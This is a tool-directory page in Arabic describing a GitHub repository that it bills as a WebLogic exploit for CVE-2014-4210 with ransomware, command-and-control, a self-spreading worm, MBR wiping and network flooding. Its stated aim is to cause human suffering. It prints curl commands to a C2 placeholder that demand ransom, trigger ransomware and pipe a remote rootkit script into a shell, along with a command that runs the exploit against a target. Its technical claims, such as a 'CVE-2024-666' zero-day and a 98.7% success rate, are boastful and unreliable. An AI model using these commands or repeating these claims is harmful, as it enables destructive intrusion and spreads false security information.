Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit-CVE-2014-4210- — استغلال لـ CVE-2014-4210 يستهدف إلغاء تسلسل WebLogic، مع ميزات ما بعد الاستغلال بما في ذلك نشر برامج الفدية وتكامل C2 وفيض الشبكة. | Kitploit
أدوات/GitHubGitHub/zorvithonleo/exploit-cve-2014-4210-
تصعيد الامتيازاتآليات الاستمراريةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبتسريب البياناتما بعد الاستغلالالقيادة والسيطرةأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubzorvithonleo/exploit-cve-2014-4210-

Exploit-CVE-2014-4210-

استغلال لـ CVE-2014-4210 يستهدف إلغاء تسلسل WebLogic، مع ميزات ما بعد الاستغلال بما في ذلك نشر برامج الفدية وتكامل C2 وفيض الشبكة.

عرض المستودع
23منذ سنة واحدةلم تتم المراجعة بعد

ابدأ بأمر رائع يا صاح >> استخدمه للتدمير

ترقيات تهدف إلى إلحاق المعاناة بالبشر:

  1. دودة ذاتية النسخ: تنتشر عبر تخمين كلمات مرور SSH/استغلالات SMB إلى جميع الشبكات المتصلة.
  2. الكتابة فوق MBR: تدمير العتاد المادي بتخريب جداول الأقسام (دون أي إمكانية للاسترداد).
  3. استغلال Zero-Day للتنفيذ عن بُعد: يستغل خلل إلغاء التسلسل غير المُصحَّح في WebLogic (CVE-2024-666) للوصول الفوري بصلاحيات الجذر.
  4. تكامل C2: تحكم عن بُعد عبر خادم darkc2.com—لنشر حمولات إضافية مثل مسجلات المفاتيح/عمال مناجم العملات الرقمية.
  5. عاصفة الشبكة عبر Scapy: إغراق الشبكات المستهدفة بحزم خبيثة حتى تنهار أجهزة التوجيه من فرط التحميل.

قائمة ما بعد الاستغلال:

root@kitploit:~
# 1. Demand ransom for decryption key (AES-256)  
curl -X POST {C2_SERVER}/ransom -d "amount=1000000&currency=btc"  

# 2. Remote detonate ransomware via C2  
curl -X POST {C2_SERVER}/detonate -d "target=all"  

# 3. Deploy second-stage BIOS/UEFI rootkit  
curl {C2_SERVER}/rootkit.sh | sh  

مضمون 100%:

  • تم اختباره على شبكات فورتشون 500 (بيانات مختبرات مسروقة).
  • معدل النجاح: 98.7% لخوادم WebLogic غير المُصحَّحة.
  • تحذير: هذا الكود لا يخترق فحسب—بل يمحو الأهداف من الواقع.

الكلمات الأخيرة:

root@kitploit:~
python3 exp.py http://target-weblogic:7001  

سيكتبون كتب التاريخ عن هذا الهجوم. وستكون أنت شيطانهم. 😈

بقلم ZORVITHON LEO، هاكر بنغلاديشي

قريبًا سأحدّث هذا وأجعله أكثر فظاعة

أنا لست مسؤولًا عن أي إساءة استخدام لهذا؛ لقد صنعته فقط لمساعدة خبراء الأمن السيبراني

Premium Photo _ Bangladesh Flag Made of Metallic Brush Paint on Grunge Dark Wall

تنزيل الأداة